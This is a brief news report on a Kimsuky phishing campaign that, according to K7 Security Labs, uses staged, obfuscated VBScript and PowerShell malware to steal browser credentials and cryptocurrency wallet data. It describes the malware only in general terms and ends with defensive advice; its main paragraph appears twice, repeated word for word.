A newly uncovered phishing campaign linked to North Korean APT group Kimsuky shows a marked evolution in its technical sophistication, particularly in targeting cryptocurrency holders and government-affiliated individuals, according to Cyber Security News.
According to K7 Security Labs, Kimsuky has deployed multi-layered malware delivered through heavily obfuscated VBScript and PowerShell components designed to bypass standard detection tools. The malware executes in stages, beginning with dynamic script generation to evade signature-based defenses, then proceeds to extract system data, browser credentials, and a wide array of cryptocurrency wallet information, including MetaMask and Trust Wallet. Notably, the malware avoids virtual machines through anti-analysis checks and uses ZIP compression to disguise stolen data before exfiltration. It communicates with a command-and-control server capable of issuing further commands, allowing persistent access. Kimsuky has clearly invested in refining its data theft and evasion techniques, researchers reported, emphasizing the groups expanded targeting scope. Security experts warn that advanced phishing education and endpoint detection are critical defenses against such sophisticated campaigns.
According to K7 Security Labs, Kimsuky has deployed multi-layered malware delivered through heavily obfuscated VBScript and PowerShell components designed to bypass standard detection tools. The malware executes in stages, beginning with dynamic script generation to evade signature-based defenses, then proceeds to extract system data, browser credentials, and a wide array of cryptocurrency wallet information, including MetaMask and Trust Wallet. Notably, the malware avoids virtual machines through anti-analysis checks and uses ZIP compression to disguise stolen data before exfiltration. It communicates with a command-and-control server capable of issuing further commands, allowing persistent access. Kimsuky has clearly invested in refining its data theft and evasion techniques, researchers reported, emphasizing the groups expanded targeting scope. Security experts warn that advanced phishing education and endpoint detection are critical defenses against such sophisticated campaigns.
